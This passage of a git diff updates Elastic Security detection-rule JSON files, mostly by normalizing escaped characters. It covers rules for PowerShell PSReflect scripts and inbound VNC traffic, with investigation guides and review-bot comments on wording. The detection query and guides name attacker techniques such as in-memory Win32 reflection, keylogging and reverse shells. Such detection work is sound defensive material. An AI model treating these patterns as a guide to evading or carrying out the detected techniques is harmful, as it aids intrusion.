Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware 
backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, 
user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n ) and\n not user.id : \"S-1-5-18\" and\n not file.path : ?\\:\\\\\\\\ProgramData\\\\\\\\MaaS360\\\\\\\\Cloud?Extender\\\\\\\\AR\\\\\\\\Scripts\\\\\\\\ASModuleCommon.ps1*\n", "references": [ "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", 
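Review bot: The new-side investigation guide keeps a copy-paste remnant in its last investigation step: `Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.` — this rule matches on `powershell.file.script_block_text`, not on a registry change, so `after the registry modification` should read `around the time of the script block execution` or be dropped. The same guide also has the fragment `The script content that may be split into multiple script blocks`, which reads better as `The script content may be split into multiple script blocks`. Both strings recur unchanged in the `56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_109.json` note hunk that follows. If these JSON files are generated from the rule source, the wording should be fixed there so the next release does not reintroduce it.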
@@ -56,7 +56,7 @@
 ],
 "risk_score": 47,
 "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_109.json b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_109.json
index 9b95fc330e9..c900673ecab 100644
--- a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_109.json
@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell PSReflect Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, 
description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware 
backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, 
user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n ) and\n not user.id : \"S-1-5-18\" and\n not file.path : ?\\:\\\\\\\\ProgramData\\\\\\\\MaaS360\\\\\\\\Cloud?Extender\\\\\\\\AR\\\\\\\\Scripts\\\\\\\\ASModuleCommon.ps1*\n", "references": [ "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", 
@@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_1.json b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_1.json index 48b9f4f2db4..fad7394e98a 100644 --- a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_1.json +++ b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
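Review bot: The `+` line for `setup` in the `@@ -56,7 +56,7 @@` hunk still carries a duplicated word, "Steps to implement the logging policy with with Advanced Audit Configuration", so the escape normalization preserves a typo that is rendered verbatim in the rule's Setup guide. The line should read `Steps to implement the logging policy with Advanced Audit Configuration:`. These rule JSON files look like exported copies of an upstream rule set, so the wording fix presumably belongs there as well, otherwise the next export will reintroduce it.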
diff --git a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_102.json b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_102.json index f8adcf09b6c..c2a55411129 100644 --- a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_102.json +++ b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_102.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_103.json b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_103.json index 43994a5e81a..e7642a6a07e 100644 --- a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_103.json +++ b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_103.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_2.json b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_2.json index a75fc1f2d4c..35451d5759e 100644 --- a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_2.json +++ b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_2.json 
@@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_101.json b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_101.json index b630f94f7e7..d80e06a7c9e 100644 --- a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_101.json +++ b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_101.json 
@@ -17,7 +17,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "VNC (Virtual Network Computing) from the Internet", - "query": "event.category:(network or network_traffic) and network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", + "query": "event.category:(network or network_traffic) and network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", 
@@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_102.json b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_102.json index 6a6d8f4a84a..318c10ca4f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_102.json 
@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "VNC (Virtual Network Computing) from the Internet", - "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", + "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", 
@@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_103.json b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_103.json index f1b2c0062fc..08e805f1601 100644 --- a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_103.json 
